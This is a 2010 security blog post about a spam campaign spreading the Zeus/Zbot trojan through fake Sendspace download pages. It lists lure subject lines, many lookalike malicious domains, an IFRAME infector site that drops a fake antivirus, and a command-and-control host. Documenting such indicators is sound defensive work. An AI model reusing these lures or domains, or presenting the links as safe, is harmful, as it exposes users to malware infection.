Internet Domain Registry

  • Subscribe to our RSS feed.
  • Twitter
  • StumbleUpon
  • Reddit
  • Facebook
  • Digg

Monday, 18 January 2010

Sendspace Zbot spreader a Flashback to Dec 15-20

Posted on 12:41 by Unknown
From December 15th to December 20th, the top Zbot or "Zeus" trojan spreader was a spam email campaign which claimed to have news about a photo that may depict the recipient. The "photo" was actually called "photo.exe" and the website from which it was to be downloaded was intended to look like "Sendspace.com", a popular file sharing service.

Beginning early in the morning of January 16th, the UAB Spam Data Mine began to notice that the Sendspace version of Zeus may be making a return. On January 16th, we received six copies of the spam, nearly identical to those received December 15-20. They came between 6:15 and 8:30 AM, and then stopped.

The spam messages ask a variation of question such as:

Hey! Is this photo yours?

Subject such as:
Fw:your photo
Re:your photo
Re:
Fw:look


and provide a link supposedly to a "sendspace" page for you to see the photo.

On January 17th, we saw another burst, beginning shortly after 8:00 AM, and ending about 10:15 AM, with 90 messages being received.

Then at 11:15 PM on January 17th the real campaign began, and has been flowing steadily ever since, although the spam is definitely on a rising trend - we've seen just over 700 copies today so far.

The URLs we've seen in the spam are these:

www.sendspace.com.iko999j0.com.pl
www.sendspace.com.iko999j0.compl
www.sendspace.com.iko999j1.com.pl
www.sendspace.com.iko999j1.compl
www.sendspace.com.iko999j1com.pl
www.sendspace.com.iko999j2.com.pl
www.sendspace.com.iko999j2.compl
www.sendspace.com.iko999j3.com.pl
www.sendspace.com.iko999j3com.pl
www.sendspace.com.iko999j4.com.pl
www.sendspace.com.iko999j5.com.pl
www.sendspace.com.iko999j5.compl
www.sendspace.com.iko999j6.com.pl
www.sendspace.com.iko999j6.compl
www.sendspace.com.iko999j7.com.pl
www.sendspace.com.iko999j7.compl
www.sendspace.com.iko999j7com.pl
www.sendspace.com.iko999j8.com.pl
www.sendspace.com.iko999j9.com.pl
www.sendspace.com.iko999j9com.pl
www.sendspace.com.iko999je.com.pl
www.sendspace.com.iko999je.compl
www.sendspace.com.iko999jq.com.pl
www.sendspace.com.iko999jqcom.pl
www.sendspace.com.iko999jr.com.pl
www.sendspace.com.iko999jrcom.pl
www.sendspace.com.iko999jt.com.pl
www.sendspace.com.iko999jw.com.pl
www.sendspace.com.iko999jw.compl
www.sendspace.com.iko999jwcom.pl
www.sendspace.comiko999j1.com.pl
www.sendspace.comiko999j4.com.pl
www.sendspace.comiko999j5.com.pl
www.sendspace.comiko999j7.com.pl
www.sendspace.comiko999j8.com.pl
www.sendspace.comiko999j9.com.pl
www.sendspace.comiko999je.com.pl
www.sendspace.comiko999jq.com.pl
www.sendspacecom.iko999j1.com.pl
www.sendspacecom.iko999j4.com.pl
www.sendspacecom.iko999j6.com.pl
www.sendspacecom.iko999j7.com.pl
www.sendspacecom.iko999j8.com.pl
www.sendspacecom.iko999j9.com.pl
www.sendspacecom.iko999je.com.pl
www.sendspacecom.iko999jw.com.pl
wwwsendspace.com.iko999j1.com.pl
wwwsendspace.com.iko999j3.com.pl
wwwsendspace.com.iko999j4.com.pl
wwwsendspace.com.iko999j7.com.pl
wwwsendspace.com.iko999j8.com.pl
wwwsendspace.com.iko999j9.com.pl

Note the two pairs of typos? Some ".compl" instead of ".com.pl" and some "sendspacecom" instead of "sendspace.com" and the "wwwsendspace" instead of "www.sendspace". Those are the reasons bad guys do test runs such as we saw on the 16th and 17th. They need to get their bugs worked out.

The webpage looks like this:





While they are at it, perhaps they'll remember to update their malware as well. The version being distributed in this campaign is the same version that was being distributed when the campaign ended on December 20th, which means that 34 out of 41 anti-virus products can detect it, according to this Virus Total Report.

The websites have a secondary infector. An IFRAME in the code calls a malicious website from "gerolli.co.uk". Last go-around it was pulling a file from the "/2img/" subdirectory there. This time around its pulling a file from "/3img/in.php", which when loaded causes "pdf.pdf" to be dropped on the machine, which leads to a Fake Anti-Virus product being installed within a few minutes.

The Zeus bot uses "stomaid.ru" as its Command & Control - just as it has since December 9th.

The computers hosting the "sendspace" version of this webpage are also hosting the "USAA" version that we discussed in yesterday's article - USAA Bank Latest Avalanche Scam.

If you want to see the December version websites, they are listed below:

www.sendspace.com.1citvil1.be
www.sendspace.com.beermeetibe
www.sendspace.com.beermeeti.be
www.sendspace.com.dftjilllcom
www.sendspace.com.dftjilll.com
www.sendspace.com.dftjilllnet
www.sendspace.com.dftjilll.net
www.sendspace.com.fbermeetibe
www.sendspace.com.fbermeeti.be
www.sendspace.com.fbsftiilcom
www.sendspace.com.fbsftiil.com
www.sendspace.com.fbsftiilnet
www.sendspace.com.fbsftiil.net
www.sendspace.com.febrmeeti.be
www.sendspace.com.feeekyyiebe
www.sendspace.com.feeekyyie.be
www.sendspace.com.feeetyyiebe
www.sendspace.com.feeetyyie.be
www.sendspace.com.feeezkyiebe
www.sendspace.com.feeezkyie.be
www.sendspace.com.feeeztyiebe
www.sendspace.com.feeeztyie.be
www.sendspace.com.feeezykiebe
www.sendspace.com.feeezykie.be
www.sendspace.com.feeezytiebe
www.sendspace.com.feeezytie.be
www.sendspace.com.feeezyyiebe
www.sendspace.com.feeezyyie.be
www.sendspace.com.feeezyyikbe
www.sendspace.com.feeezyyik.be
www.sendspace.com.feeezyykebe
www.sendspace.com.feeezyyke.be
www.sendspace.com.feekzyyie.be
www.sendspace.com.feermeetibe
www.sendspace.com.feermeeti.be
www.sendspace.com.feetzyyie.be
www.sendspace.com.fekezyyiebe
www.sendspace.com.fekezyyie.be
www.sendspace.com.fetezyyie.be
www.sendspace.com.ffmjilllcom
www.sendspace.com.ffmjilll.com
www.sendspace.com.ffmjilllnet
www.sendspace.com.ffmjilll.net
www.sendspace.com.ffmjtlllcom
www.sendspace.com.ffmjtlll.com
www.sendspace.com.ffmjtlllnet
www.sendspace.com.ffmjtlll.net
www.sendspace.com.ffmjttllcom
www.sendspace.com.ffmjttll.com
www.sendspace.com.fftjilllcom
www.sendspace.com.fftjilll.com
www.sendspace.com.fftjilllnet
www.sendspace.com.fftjilll.net
www.sendspace.com.fkeezyyiebe
www.sendspace.com.fkeezyyie.be
www.sendspace.com.ftcftiilcom
www.sendspace.com.ftcftiil.com
www.sendspace.com.ftcftiilnet
www.sendspace.com.ftcftiil.net
www.sendspace.com.fteezyyiebe
www.sendspace.com.fteezyyie.be
www.sendspace.com.ftsftiilcom
www.sendspace.com.ftsftiil.com
www.sendspace.com.ftsftiilnet
www.sendspace.com.ftsftiil.net
www.sendspace.com.ftsftiitcom
www.sendspace.com.ftsftiit.com
www.sendspace.com.ftsftiitnet
www.sendspace.com.ftsftiit.net
www.sendspace.com.ftsftiulcom
www.sendspace.com.ftsftiul.com
www.sendspace.com.ftsftiulnet
www.sendspace.com.ftsftiul.net
www.sendspace.com.ftsftkilcom
www.sendspace.com.ftsftkil.com
www.sendspace.com.ftsftkilnet
www.sendspace.com.ftsftkil.net
www.sendspace.com.ftsftmilcom
www.sendspace.com.ftsftmil.com
www.sendspace.com.ftsfttilcom
www.sendspace.com.ftsfttil.com
www.sendspace.com.ftsfttilnet
www.sendspace.com.ftsfttil.net
www.sendspace.com.hcitvil1.be
www.sendspace.com.hreseet01.be
www.sendspace.com.hufteejkibe
www.sendspace.com.hufteejki.be
www.sendspace.com.i1itvil1.be
www.sendspace.com.ic1tvil1.be
www.sendspace.com.ichtvil1.be
www.sendspace.com.ici1vil1.be
www.sendspace.com.icihvil1.be
www.sendspace.com.icit1il1.be
www.sendspace.com.icithil1.be
www.sendspace.com.icitv1l1.be
www.sendspace.com.icitvhl1.be
www.sendspace.com.icitvi11.be
www.sendspace.com.icitvih1.be
www.sendspace.com.icitvil1.be
www.sendspace.com.ihitvil1.be
www.sendspace.com.ireheet01.be
www.sendspace.com.ireseet01.be
www.sendspace.com.ireseht01.be
www.sendspace.com.iresehtt1.be
www.sendspace.com.iresett01.be
www.sendspace.com.ireshet01.be
www.sendspace.com.ireteht01.be
www.sendspace.com.irhseet01.be
www.sendspace.com.iteseht01.be
www.sendspace.com.jtualasabe
www.sendspace.com.jtualasa.be
www.sendspace.com.juzeepee0.jpn.com
www.sendspace.com.kjifatilacom
www.sendspace.com.kjifatila.com
www.sendspace.com.ktualasabe
www.sendspace.com.ktualasa.be
www.sendspace.com.lhfteejkibe
www.sendspace.com.lhfteejki.be
www.sendspace.com.lipskuiil.com
www.sendspace.com.lipskuiil.jpn.com
www.sendspace.com.lipskuiil.kr.com
www.sendspace.com.lipskuiil.no.com
www.sendspace.com.lipskuiil.uy.com
www.sendspace.com.lufheejkibe
www.sendspace.com.lufheejki.be
www.sendspace.com.lufteejkibe
www.sendspace.com.lufteejki.be
www.sendspace.com.lufteejkvbe
www.sendspace.com.lufteejkv.be
www.sendspace.com.lufteejvibe
www.sendspace.com.lufteejvi.be
www.sendspace.com.lufteevkibe
www.sendspace.com.lufteevki.be
www.sendspace.com.luftevjkibe
www.sendspace.com.luftevjki.be
www.sendspace.com.lufthejkibe
www.sendspace.com.lufthejki.be
www.sendspace.com.luhteejkibe
www.sendspace.com.luhteejki.be
www.sendspace.com.mjifatilacom
www.sendspace.com.mjifatila.com
www.sendspace.com.mjifatilwcom
www.sendspace.com.mjifatilw.com
www.sendspace.com.mjifatiwacom
www.sendspace.com.mjifatiwa.com
www.sendspace.com.mjifatwlacom
www.sendspace.com.mjifatwla.com
www.sendspace.com.mjifawilacom
www.sendspace.com.mjifawila.com
www.sendspace.com.mjifwtilacom
www.sendspace.com.mjifwtila.com
www.sendspace.com.mjiuatilacom
www.sendspace.com.mjiuatila.com
www.sendspace.com.mjiwatilacom
www.sendspace.com.mjiwatila.com
www.sendspace.com.mjufatilacom
www.sendspace.com.mjufatila.com
www.sendspace.com.mjwfatilacom
www.sendspace.com.mjwfatila.com
www.sendspace.com.mnvdtdt.co.uk
www.sendspace.com.mnvdtdt.me.uk
www.sendspace.com.mnvdtdt.orguk
www.sendspace.com.mnvdtdt.org.uk
www.sendspace.com.mnvdtdtorg.uk
www.sendspace.com.modeservicepp.co.kr
www.sendspace.com.modeservicepp.com
www.sendspace.com.modeservicepp.kr
www.sendspace.com.muifatilacom
www.sendspace.com.muifatila.com
www.sendspace.com.mwifatilacom
www.sendspace.com.mwifatila.com
www.sendspace.com.polaasa1qc.com
www.sendspace.com.pretopsd.co.uk
www.sendspace.com.pretopsdco.uk
www.sendspace.com.pretopsd.me.uk
www.sendspace.com.pretopsd.org.uk
www.sendspace.com.tjualasabe
www.sendspace.com.tjualasa.be
www.sendspace.com.tkualasabe
www.sendspace.com.tkualasa.be
www.sendspace.com.ttjalasabe
www.sendspace.com.ttjalasa.be
www.sendspace.com.ttkalasabe
www.sendspace.com.ttkalasa.be
www.sendspace.com.ttuajasabe
www.sendspace.com.ttuajasa.be
www.sendspace.com.ttuakasabe
www.sendspace.com.ttuakasa.be
www.sendspace.com.ttualakabe
www.sendspace.com.ttualaka.be
www.sendspace.com.ttualasabe
www.sendspace.com.ttualasa.be
www.sendspace.com.ttualaskbe
www.sendspace.com.ttualask.be
www.sendspace.com.ttualjsabe
www.sendspace.com.ttualjsa.be
www.sendspace.com.ttualksabe
www.sendspace.com.ttualksa.be
www.sendspace.com.ttujlasabe
www.sendspace.com.ttujlasa.be
www.sendspace.com.ttuklasabe
www.sendspace.com.ttuklasa.be
www.sendspace.com.ujifatilacom
www.sendspace.com.ujifatila.com
www.sendspace.com.vdslprr.co.uk
www.sendspace.com.vdslprr.me.uk
www.sendspace.com.vdslprr.org.uk
www.sendspace.com.vufteejkibe
www.sendspace.com.vufteejki.be
www.sendspace.com.wjifatilacom
www.sendspace.com.wjifatila.com
Email ThisBlogThis!Share to XShare to Facebook
Posted in zbot | No comments
Newer Post Older Post Home

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Popular Posts

  • Happy New Year! Here's a Virus! (New Year's Postcard malware)
    I've been busy this week looking at the various defacements (see ComputerWorld , and ABC News ) and other cyber attacks (see yesterday...
  • From Russia, With Love . . . new Postcard spam spies on your PC
    Isn't it nice to have friends who send you postcards? The UAB Spam Data Mine is especially fortunate in that way. Beginning the evenin...
  • New Year's Waledac Card
    We haven't seen a new version of Waledac since Independence Day (July 4, 2009), but it looks like its back! I'm on vacation today, s...
  • Top Brands Imitated by Malicious Spam
    WebSense recently released an InfoGraphic titled "Top Five Subject Lines in Phishing Emails." for January 1, 2013 through Septemb...
  • Tempting Photo Attachments Lead to Fake AV
    One of today's largest malicious spam campaigns continued an occasional theme we've been seeing for a few weeks. A subject line, fo...
  • What about the Social Security Numbers? (The Utah Data Breach and your SSN)
    The Utah Data Breach This week the continuing saga of the Utah Medicaid Data Breach continued to unfold. If you haven't been following...
  • Stop the Rumors: Quit SMSing about WalMart Gang Initiations
    My daughter and her teenage friend were sitting on the couch watching TV today when they began getting text messages on their phone. Here...
  • Minipost: IPR Center celebrates Cyber Monday
    The National Intellectual Property Rights Center (IPR Center) announced today that in celebration of Cyber Monday, they have Seized 82 Domai...
  • ACH Spammer switches to Shortened URLs
    For many weeks now the spammers behind one particular malware family have been fighting a running battle to keep their malware-hosting domai...
  • Work at Home . . . for a Criminal?
    How do you tell if a "Work at Home" invitation is a scam? Here's a clue: It comes in your email. In today's Blog, I tho...

Categories

  • china
  • computer security careers
  • conficker
  • cyberwar
  • digital certificates
  • facebook
  • fake av
  • gumblar
  • koobface
  • law enforcement
  • malware
  • pharmaceuticals
  • phishing
  • public policy
  • spam
  • twitter
  • twitter malware
  • waledac
  • zbot

Blog Archive

  • ►  2013 (21)
    • ►  December (4)
    • ►  November (1)
    • ►  October (1)
    • ►  September (1)
    • ►  August (3)
    • ►  July (1)
    • ►  June (1)
    • ►  May (5)
    • ►  April (3)
    • ►  March (1)
  • ►  2012 (18)
    • ►  August (1)
    • ►  June (1)
    • ►  May (7)
    • ►  April (2)
    • ►  March (7)
  • ►  2011 (28)
    • ►  November (3)
    • ►  October (1)
    • ►  August (4)
    • ►  July (6)
    • ►  June (1)
    • ►  May (2)
    • ►  April (2)
    • ►  March (6)
    • ►  February (1)
    • ►  January (2)
  • ▼  2010 (80)
    • ►  December (6)
    • ►  November (10)
    • ►  October (6)
    • ►  September (12)
    • ►  August (5)
    • ►  July (4)
    • ►  June (11)
    • ►  April (7)
    • ►  March (8)
    • ►  February (4)
    • ▼  January (7)
      • Minipost: VISA Zeus
      • American Bankers Association version of Zeus Bot /...
      • AOL Update spreads Zeus / Zbot
      • Sendspace Zbot spreader a Flashback to Dec 15-20
      • USAA Bank latest Avalanche Scam
      • Minipost: #CNIRcyberwar ? ? ?
      • Iranian Cyber Army returns - target: Baidu.com
  • ►  2009 (92)
    • ►  December (12)
    • ►  November (11)
    • ►  October (16)
    • ►  September (7)
    • ►  July (5)
    • ►  June (10)
    • ►  May (2)
    • ►  April (6)
    • ►  March (7)
    • ►  February (6)
    • ►  January (10)
  • ►  2008 (101)
    • ►  December (7)
    • ►  November (17)
    • ►  October (11)
    • ►  September (10)
    • ►  August (22)
    • ►  July (12)
    • ►  June (3)
    • ►  May (7)
    • ►  April (5)
    • ►  March (2)
    • ►  February (1)
    • ►  January (4)
  • ►  2007 (31)
    • ►  December (3)
    • ►  November (9)
    • ►  October (3)
    • ►  September (2)
    • ►  August (5)
    • ►  July (5)
    • ►  January (4)
  • ►  2006 (5)
    • ►  December (2)
    • ►  October (3)
Powered by Blogger.

About Me

Unknown
View my complete profile